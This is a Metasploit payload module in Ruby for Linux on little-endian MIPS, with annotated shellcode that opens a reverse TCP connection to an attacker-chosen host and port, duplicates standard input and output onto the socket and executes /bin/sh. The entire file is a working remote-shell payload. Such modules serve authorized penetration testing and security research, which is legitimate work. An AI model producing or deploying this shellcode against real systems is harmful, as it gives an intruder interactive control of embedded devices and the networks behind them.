Path: blob/master/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux MIPS little-endian, single-stage reverse TCP command shell.
#
# The machine code in #generate is emitted as fixed 4-byte little-endian MIPS
# instructions; the only values substituted at generate time are the
# LHOST/LPORT bytes spliced into the lui/ori immediates of the sockaddr setup.
module MetasploitModule
  # Byte length of the shellcode built in #generate: 46 instructions x 4 bytes.
  # Must stay in sync with the listing below if an instruction is ever added or removed.
  CachedSize = 184

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module's metadata with the framework.
  #
  # @param info [Hash] metadata overrides merged over the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Reverse TCP Inline',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'Author' => [
          'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSLE,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        # Empty placeholder: the real bytes are assembled in #generate.
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Assembles the shellcode for the configured LHOST/LPORT.
  #
  # @param _opts [Hash] unused here; accepted for interface compatibility with the framework
  # @return [String] the parent's output followed by the 184-byte shellcode, or only the
  #   parent's output when LHOST is unset (presumably the '' placeholder from #initialize,
  #   so the module can be loaded and sized without a target address -- confirm against
  #   Msf::Payload::Single#generate)
  # @raise [ArgumentError] from Integer() when LPORT is not an integer string
  def generate(_opts = {})
    if !datastore['LHOST'] || datastore['LHOST'].empty?
      return super
    end

    host = Rex::Socket.addr_atoi(datastore['LHOST'])
    # NOTE(review): LPORT is not range-checked here; pack('n') below keeps only the
    # low 16 bits of an out-of-range value, producing a silently wrong sockaddr.
    # Confirm the option layer rejects ports outside 0..65535 before relying on it.
    port = Integer(datastore['LPORT'])

    # Network byte order, split into single bytes. unpack('c') yields signed
    # values; pack('C2') further down keeps the low 8 bits, so 0x80..0xff bytes
    # survive the round trip unchanged.
    host = [host].pack('N').unpack('cccc')
    port = [port].pack('n').unpack('cc')

    shellcode =
      # sys_socket
      # a0: domain
      # a1: type
      # a2: protocol
      # li/nor/addi derive a0 = ~(-6) - 3 = 2, a1 = 2, a2 = (0 < -1) = 0,
      # i.e. AF_INET, SOCK_STREAM, 0. Syscall numbers are Linux MIPS o32 (4000 + n).
      "\xfa\xff\x0f\x24" + # li t7,-6
      "\x27\x78\xe0\x01" + # nor t7,t7,zero
      "\xfd\xff\xe4\x21" + # addi a0,t7,-3
      "\xfd\xff\xe5\x21" + # addi a1,t7,-3
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x57\x10\x02\x24" + # li v0,4183 # sys_socket
      "\x0c\x01\x01\x01" + # syscall 0x40404

      # sys_connect
      # a0: sockfd (stored on the stack)
      # a1: addr (data stored on the stack)
      # a2: addrlen
      # Builds a sockaddr_in below sp: family (~0xfffd = 0x...0002) at sp-30,
      # port word at sp-28, address word at sp-26. The 4-byte stores overlap;
      # each later store wins, and a1 is then pointed at sp-30. a2 = ~(-17) = 16,
      # the size of the structure. The immediates quoted in the lui/ori comments
      # are from the original listing; the real bytes come from port/host above.
      "\xff\xff\xa2\xaf" + # sw v0,-1(sp)
      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
      "\xfd\xff\x0f\x34" + # li t7,0xfffd
      "\x27\x78\xe0\x01" + # nor t7,t7,zero
      "\xe2\xff\xaf\xaf" + # sw t7,-30(sp)
      port.pack('C2') + "\x0e\x3c" + # lui t6,0x1f90
      port.pack('C2') + "\xce\x35" + # ori t6,t6,0x1f90
      "\xe4\xff\xae\xaf" + # sw t6,-28(sp)
      host[2..3].pack('C2') + "\x0e\x3c" + # lui t6,0x7f01
      host[0..1].pack('C2') + "\xce\x35" + # ori t6,t6,0x101
      "\xe6\xff\xae\xaf" + # sw t6,-26(sp)
      "\xe2\xff\xa5\x27" + # addiu a1,sp,-30
      "\xef\xff\x0c\x24" + # li t4,-17
      "\x27\x30\x80\x01" + # nor a2,t4,zero
      "\x4a\x10\x02\x24" + # li v0,4170 # sys_connect
      "\x0c\x01\x01\x01" + # syscall 0x40404

      # sys_dup2
      # a0: oldfd (socket)
      # a1: newfd (0, 1, 2)
      # s1 starts at ~(-3) = 2 and is decremented each pass; bne jumps back to
      # dup2_loop (the move a1,s1 six instructions earlier) until s1 equals
      # s0 = -1, so fds 2, 1 and 0 are each duplicated onto the socket. The
      # instruction after bne (the slti below) executes in the branch delay slot
      # on every iteration; it only sets a2, which is harmless here.
      "\xfd\xff\x11\x24" + # li s1,-3
      "\x27\x88\x20\x02" + # nor s1,s1,zero
      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
      "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
      "\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2
      "\x0c\x01\x01\x01" + # syscall 0x40404
      "\xff\xff\x10\x24" + # li s0,-1
      "\xff\xff\x31\x22" + # addi s1,s1,-1
      "\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>

      # sys_execve
      # a0: filename (stored on the stack) "//bin/sh"
      # a1: argv "//bin/sh"
      # a2: envp (null)
      # Stack layout: "//bi" at sp-20, "n/sh" at sp-16, NUL word at sp-12, then
      # argv = [sp-20, NULL] at sp-8 / sp-4. a2 = 0 comes from the slti above.
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
      "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
      "\xec\xff\xaf\xaf" + # sw t7,-20(sp)
      "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
      "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
      "\xf0\xff\xae\xaf" + # sw t6,-16(sp)
      "\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
      "\xec\xff\xa4\x27" + # addiu a0,sp,-20
      "\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
      "\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
      "\xf8\xff\xa5\x27" + # addiu a1,sp,-8
      "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve
      "\x0c\x01\x01\x01" # syscall 0x40404

    # Implicit-argument super runs the parent's generate; its output is prepended.
    return super + shellcode
  end
end